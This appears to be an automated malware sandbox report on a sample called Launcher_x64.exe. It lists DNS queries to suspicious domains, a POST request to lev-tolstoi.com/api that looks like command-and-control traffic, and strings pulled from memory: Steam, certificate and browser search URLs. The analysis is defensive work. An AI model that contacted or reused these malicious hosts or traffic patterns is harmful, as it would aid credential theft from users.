frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: bellflamre.click
                Source: global trafficDNS traffic detected: DNS query: sendypaster.xyz
                Source: global trafficDNS traffic detected: DNS query: steppriflej.xyz
                Source: global trafficDNS traffic detected: DNS query: greywe-snotty.cyou
                Source: global trafficDNS traffic detected: DNS query: supporse-comment.cyou
                Source: global trafficDNS traffic detected: DNS query: smash-boiling.cyou
                Source: global trafficDNS traffic detected: DNS query: ripe-blade.cyou
                Source: global trafficDNS traffic detected: DNS query: hosue-billowy.cyou
                Source: global trafficDNS traffic detected: DNS query: pollution-raker.cyou
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Launcher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2456214724.0000000001088000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: Launcher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2456214724.0000000001088000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: Launcher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2456214724.0000000001088000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433824621.000000000101F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: Launcher_x64.exe, 00000003.00000003.2503346324.00000000035F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433824621.000000000101F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433824621.000000000101F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433824621.000000000101F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433824621.000000000101F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433824621.000000000101F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: Launcher_x64.exe, 00000003.00000003.2503346324.00000000035F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: Launcher_x64.exe, 00000003.00000003.2503346324.00000000035F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Launcher_x64.exe, 00000003.00000003.2456252406.0000000001036000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2610718575.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.0000000001036000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2556263712.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2555293768.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: Launcher_x64.exe, 00000003.00000002.2611002767.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/-
                Source: Launcher_x64.exe, 00000003.00000003.2433702875.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/0
                Source: Launcher_x64.exe, 00000003.00000003.2456252406.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/1&0
                Source: Launcher_x64.exe, 00000003.00000003.2555293768.0000000001036000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2530449435.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: Launcher_x64.exe, 00000003.00000003.2456252406.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apip
                Source: Launcher_x64.exe, 00000003.00000003.2556263712.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2555293768.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/e
                Source: Launcher_x64.exe, 00000003.00000003.2456252406.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/om1&0
                Source: Launcher_x64.exe, 00000003.00000002.2611002767.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: Launcher_x64.exe, 00000003.00000002.2611002767.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piE
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
